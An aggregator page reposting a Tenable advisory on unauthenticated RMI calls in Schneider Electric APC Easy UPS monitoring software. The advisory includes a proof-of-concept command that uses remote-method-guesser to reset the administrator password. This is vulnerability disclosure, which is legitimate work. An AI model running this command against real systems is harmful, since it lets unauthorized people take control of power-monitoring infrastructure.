all InfoSec news
Schneider Electric APC Easy UPS Online Monitoring Software Unauthenticated RMI Calls
April 21, 2023, 5:42 p.m. | Nick Miles
Tenable Research Advisories www.tenable.com
A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.
For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.
POC:
- Install remote-method-guesser (https://github.com/qtc-de/remote-method-guesser/)
- Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call 41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system
- This command attempts to …
apc application change electric issue java monitoring monitoring software schneider schneider electric software ups vulnerability
More from www.tenable.com / Tenable Research Advisories
Microsoft Azure Firewall Bypass Vulnerability
6 days, 13 hours ago |
www.tenable.com
Fluent Bit Memory Corruption Vulnerability
3 weeks, 2 days ago |
www.tenable.com
Cross-Site Scripting in WordPress RSS Aggregator Plugin
3 weeks, 5 days ago |
www.tenable.com
Solidus Stored Cross-Site Scripting
3 weeks, 5 days ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
CyberSOC Technical Lead
@ Integrity360 | Sandyford, Dublin, Ireland
Cyber Security Strategy Consultant
@ Capco | New York City
Cyber Security Senior Consultant
@ Capco | Chicago, IL
Senior Security Researcher - Linux MacOS EDR (Cortex)
@ Palo Alto Networks | Tel Aviv-Yafo, Israel
Sr. Manager, NetSec GTM Programs
@ Palo Alto Networks | Santa Clara, CA, United States
SOC Analyst I
@ Fortress Security Risk Management | Cleveland, OH, United States